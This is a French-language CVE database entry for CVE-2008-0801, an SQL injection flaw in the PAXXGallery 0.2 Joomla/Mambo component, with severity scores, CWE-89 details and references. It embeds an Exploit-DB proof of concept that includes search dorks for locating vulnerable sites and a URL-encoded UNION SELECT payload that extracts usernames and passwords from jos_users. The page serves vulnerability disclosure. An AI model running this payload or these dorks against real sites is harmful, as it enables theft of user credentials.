CVE-2008-0801 : Détail

CVE-2008-0801

SQL Injection
A03-Injection
0.26%V3
Network
2008-02-15
20h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

SQL injection vulnerability in index.php in the PAXXGallery (com_paxxgallery) 0.2 component for Mambo and Joomla! allow remote attackers to execute arbitrary SQL commands via (1) the iid parameter in a view action, and possibly (2) the userid parameter.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 5117

Date de publication : 2008-02-13 23h00 +00:00
Auteur : S@BUN
EDB Vérifié : Yes

############################################################### # # joomla SQL Injection(com_paxxgallery) # ############################################################### # # AUTHOR : S@BUN # # HOME : http://www.milw0rm.com/author/1334 # http://www.hackturkiye.com # # MAÄ°L : hackturkiye.hackturkiye@gmail.com # # ################################################################ # # DORK 1 : allinurl: com_paxxgallery "iid" # # DORK 2 : allinurl: com_paxxgallery "userid" # ################################################################ EXPLOIT : AFTER userid ADD EXPLÄ°OT(USERÄ°D DEN SONRA EXPLOÄ°T EKLE) EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOÄ°T EXPLOIT== S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F%2A%2A%2Ffrom%2F%2A%2A%2Fjos_users ################################################################ # S@BUN i AM NOT HACKER S@BUN ################################################################ <name>paxxgallery</name> <author>Tobias Floery</author> <copyright>(c) Tobias Floery</copyright> <license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license> <authorEmail>tobias@floery.net</authorEmail> <authorUrl>www.floery.net</authorUrl> <version>0.2</version> <creationDate>07.01.2006</creationDate> <description> <![CDATA[ <h1>The PHP AjaX Gallery</h1> PAXXGallery is a PHP and JS Gallery Component for Joomla using AJAX Technology. The component is designed to work even with Safe- Mode: ON! servers and a FTP Upload is integrated. ]]> </description> # milw0rm.com [2008-02-14]

Products Mentioned

Configuraton 0

Paxxgallery>>Com_paxxgallery >> Version 0.2

    Joomla>>Joomla\! >> Version *

    Mambo-foundation>>Mambo >> Version *

      Références

      http://www.securityfocus.com/bid/27811
      Tags : vdb-entry, x_refsource_BID
      https://www.exploit-db.com/exploits/5117
      Tags : exploit, x_refsource_EXPLOIT-DB